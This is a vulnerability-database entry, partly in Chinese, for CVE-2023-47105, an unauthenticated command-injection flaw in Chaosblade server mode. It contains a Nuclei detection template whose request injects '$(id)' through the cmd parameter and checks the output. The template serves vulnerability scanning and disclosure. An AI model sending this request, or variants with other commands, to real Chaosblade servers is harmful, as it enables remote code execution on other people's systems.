CVE-2023-47105: Chaosblade < 1.7.4 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Chaosblade | POC: 已公开

漏洞描述

exec.CommandContext in Chaosblade 0.3 through 1.7.3, when server mode is used, allows OS command execution via the cmd parameter without authentication.

PoC代码[已公开]

id: CVE-2023-47105

info:
  name: Chaosblade < 1.7.4 - Remote Code Execution
  author: s4e-io
  severity: high
  description: |
    exec.CommandContext in Chaosblade 0.3 through 1.7.3, when server mode is used, allows OS command execution via the cmd parameter without authentication.
  impact: |
    This vulnerability allows unauthenticated attackers to remotely invoke the HTTP service and execute arbitrary commands on any Chaosblade instance with server mode enabled. This could lead to unauthorized access and control over the host system running Chaosblade.
  remediation: Fixed in 1.7.4
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47105
    - https://github.com/advisories/GHSA-723h-x37g-f8qm
    - https://github.com/chaosblade-io/chaosblade/blob/0a07380c9899febb2b544132783b376b44226cca/exec/os/executor.go#L68
    - https://narrow-oatmeal-0c0.notion.site/ChaosBlade-Remote-Command-Execution-CVE-2023-47105-4f5459046488436caaec2bced6ff26d7
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
    cvss-score: 8.6
    cve-id: CVE-2023-47105
    cwe-id: CWE-78
    epss-score: 0.19961
    epss-percentile: 0.95257
  metadata:
    verified: true
    max-request: 1
    vendor: chaosblade-io
    product: chaosblade
  tags: cve,cve2023,chaosblade,rce,vkev,vuln

http:
  - raw:
      - |
        GET /chaosblade?cmd=$(id) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"uid=", "code", "success\":false", "error")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221009dd30207a83855c0ae23440b80f3f26ae28f4540e231518a09e5c84d8d32666a022034ddd2006c28e042c4d00b2eb1dc7e2b0229f7445a9c85d5b6eb370122ca55cb:922c64590222798bb761d5b6d8e72950

相关漏洞推荐